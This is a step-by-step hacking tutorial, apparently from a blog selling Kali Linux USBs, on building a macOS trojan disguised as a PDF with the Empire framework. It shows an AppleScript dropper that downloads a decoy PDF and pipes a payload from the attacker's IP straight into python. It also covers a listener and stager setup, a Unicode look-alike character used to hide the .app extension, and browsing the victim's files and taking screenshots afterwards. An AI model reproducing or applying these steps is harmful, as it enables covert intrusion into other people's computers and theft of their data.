A quick preview of what’s to come:
- Install the listening tool – we will be using Empire to generate an applescript payload and listen for the signal to start the session.
- Create the listener – using Empire, we will input and IP address and port as parameters, as well as the type of listener.
- Create the stager – using Empire, we will create the stager, the module that generates the custom applescript. Once we input the hacker’s IP address, listening port, and payload to use, Empire will generate an applescript that we can export as an application that will start up a session.
- Save the trojan to a file – after we generate the script, we will need to transfer it to our mac. This can be done easily by emailing the file to yourself (don’t worry, you won’t hack yourself if you send it via text file)
- Create a python web server – we want to create a web server that our applescript can use to download files. When the victim opens our fake pdf, we want to download and display the image that they think they will see. After all, a pdf that opens nothing is very suspicious.
- Install GIMP, a photo editor – we are going to disguise our trojan file as a pdf, and so we need a picture for the file to display. GIMP allows us to do just this.
- Export and edit the pdf – in order to make the image more convincing, we will edit the image we will use in GIMP. We will also convert it to an icns file, allowing us to use the image as an icon for a file.
- Insert the script – using the mac’s custom script editor, we will be able to create an application file (mac equivalent of an exe file) that will run our trojan.
- Disguise the file – an application file will trigger alarm bells in our victim’s head. By changing the icon image and using a couple of tricks to disguise the file extension, we can make the application file look just like a normal pdf.
- Poke around in the shell – once the victim clicks on the “pdf,” we will gain access to the victim’s computer, including the file system, webcam, and certain systems.
Part 1: Creating the listener and web server
Step 1: Install the listening tool
For those of you who have read other articles by us, you should be very familiar with Metasploit and how it can allow you to remotely access a trojan that you planted on some unsuspecting person’s computer. It also comes pre-installed on Kali, making it extra convenient. Instead of Metasploit, we’re going to use a different listening tool: Empire.
Empire is a framework similar to Metasploit in that it allows you to snoop around inside a network, oftentimes undetected. However, Empire is much more specialized, being used specifically for generating windows payloads. However, Empire can be used on Mac as well.
If you already have Empire, skip to step 2
To install Empire, simply type
Into the terminal. This tells Kali to go into a github repository and clones the code inside it (Git also comes pre-installed on all Kali USBs sold by the website listed above). After a few seconds, Empire will be installed.
Before we can use Empire, we need to set it up and install everything necessary.
Move into the Empire folder and then into the setup folder using cd, then install Empire by typing in
Eventually, you will be prompted to enter a password. I set it to “toor” due to tradition.
To run Empire, type in
To get back to the previous directory, then type in
To start it up.
Step 1.5: Fixing any errors
It is very possible that when you try to run Empire, it will give you an import error like this one:
If this happens, don’t panic. Most of the time, you can fix this by doing a simple
sudo apt-get install python-[missing module name]
pip install [missing module name]
Eventually, you will install everything necessary and get to this screen.
Step 2: Creating the listener
If you haven’t already, type in
While in the Empire directory to start the Empire program. Once in, type in
To tell Empire that we want to set up a listener. From there, we can type in
To see all the commands available to us
We can type in
To use an http listener, which will wait until it receives a signal over http to start up a shell on the target computer where we can poke around.
We can type in
To see the options set for this listener.
It is very important for the port to be set to 80 and the host to be set to 0.0.0.0. Port 80 is the port that is used for http traffic, and a host of 0.0.0.0 will allow the listener to get traffic from any IP address.
We can type
set Host 0.0.0.0
To set the host to 0.0.0.0. Similarly, we can type
set Port 80
To set the listening port to 80 if it isn’t already set there. We will then type
Again to see the changes.
We are done with the setup. Type in
To start up the listener.
If we type in
We see that our http listener is active.
Step 3: Create the stager
A stager is similar to a payload. When the exploit is executed on the victim’s computer, it links the payload back to the Empire session, allowing us to maneuver throughout the victim’s system.
And then press the tab key twice to list all available stagers
In this tutorial, we will be using applescript, as we will be hacking a mac os.
If we type in
We can see the information regarding this stager. We see that there is no listener given.
In order to set the listener to http, we simply type
set Listener http
And then type
To see the changes.
To create the stager.
We see that a bash command is generated. We will copy this into a new file. This block of code is our trojan. We will copy this code and place it in the fake pdf.
Step 4: Save the trojan
Open up a new terminal window and type in
To create a new directory that holds all the files that will be important to this hack.
To enter that directory. We will create a file that contains the trojan code from the applescript stager.
To create the file
Right click and paste the trojan code into the file. Then type in ctrl-x and press ‘y’ to save the file.
To check that we did everything right, we can view the trojan code by typing in
If you followed all of the instructions, it should look like this picture below.
Step 5: Start the python web server
This web server allows anyone to download our trojan, but our intended target is the person who downloads the fake pdf. To start up the web server, open a new terminal window, make sure you are in the trojan_files directory, and type in
python3 -m http.server 8080 &
If we open up a browser window and type in our IP address and the port we used with the format [IP address]:[Port], we can see the file.
Part 2: Creating the pdf
We will be creating a real pdf for this exploit. This pdf will have a macro enabled so that it downloads our trojan every time the pdf is opened. It will connect to our python web server and download the trojan file that we have saved.
Step 1: Find the image and install GIMP
To create the pdf, search up the image that you’d like to send your victim and save it in your trojan_files directory.
Next, we want to install GIMP, which is a powerful photo editing tool. This will allow us to create our pdf. Simply type
sudo apt-get install gimp
to install it.
Next, we want to open up our image in GIMP. To do so, we type
Step 2: Export the picture and edit the size
In GIMP, we want to export the picture as a pdf, which can be done by clicking “file”, then “export as.” We can then rename the file and choose the type of file to export it to from the menu below. In this case, we want to export it to a pdf.
Apple icons are always perfect squares, so you may have to resize the image’s width or height so they are equal. To do this, simply go to Image and click on Canvas Size. We can now edit the size of the image. Make sure the fill with option has “transparency” selected.
Next, we want to scale the image. Click on “Image”, and then click on “Scale Image.” We want to scale the image to 256 x 256 pixels.
Finally, we want to export the jpg image as a png. This will allow us to easily convert the image to an icns file, which is used by apple to display images. This lends more credibility for our fake trojan. If you don’t want to export the image as a png for whatever reason, you can use cloudconvert to convert the image from a png file, you can convert the jpg file to a png file, and then to an icns file.
Go to https://cloudconvert.com/ to convert the image.
After it converts, download the image and move it from your downloads directory to your trojan_files directory using
cd ../Downloads mv image_copy.icns ../trojan_files/ cd ../trojan_files/
Once you are done, you should see the image copy in the trojan_files folder.
Step 3: Insert the shell script and edit the pdf
Now, we are going to switch over to using a mac so we can create applescripts to embed in our pdf.
In the “utilities” folder listed under “Applications,” we see the script editor program. This will allow us to create custom applescripts. We will use this to download our trojan from our python web server.
Open up the script editor, and type in
do shell script "s=[Attacker_IP]:[Web_server_port]; curl -s $s/[pdf_file] | open -f -a Preview.app & curl - s $s/[Name_of_Trojan_File] | python -"
The attacker IP and port are the ip address of your computer (the attacking computer), and the port that the python web server is on. Type in the same things you used to access the python web server after you created it.
We are going to save this script as an “Application” file (mac equivalent of a .exe file). Click “file”, then export.
I recommend saving it to the desktop so we can easily work with the applescript. Our goal is to make it look identical to the real pdf.
In order to change the display image of the trojan file, right click on the trojan and click “get info.” You will then be able to drag the icns file that we made and put that as the image.
Step 4: Make the trojan appear as innocent as possible
The next thing we want to do is add a .pdf extension to the end of the file. However, when we try to rename it with a .pdf at the end, the mac will add the .app extension at the end.
The best way to mitigate this is to use a unicode character that looks like a p, d, or f, but actually isn’t. I recommend using unicode character U+217E, the lowercase character for the roman numeral d. It looks almost identical to the letter d and I guarantee that no one will notice any difference.
The last thing that we might need to do is add a few lines to the plist document in the trojan. Sometimes, two windows will appear on the bottom dock when you open up the trojan pdf. That looks suspicious, as a normal pdf will only open one window when opened. However, we can fix this by adding these lines to the plist document.
Step 5: Poke around in your new shell
After the victim opens up the pdf with the trojan, we will see that Empire will respond with a new session.
From here, we can open up a new terminal and start Empire again. We will see that there are active agents.
We can type “agents” to navigate to the agents menu. From there, we can list our agents by typing
and we can interact with our agents by typing
If we type in
We can see the commands that are available to us, including the beloved ability to take a screenshot, but you can also do more advanced things like run a python script or download files.
Hopefully you now have a good understanding of how easy it can be to hack into a target system and cause a bit of mischief. If you want to try this out yourself, you can buy a live Kali Linux usb with installation instructions right here.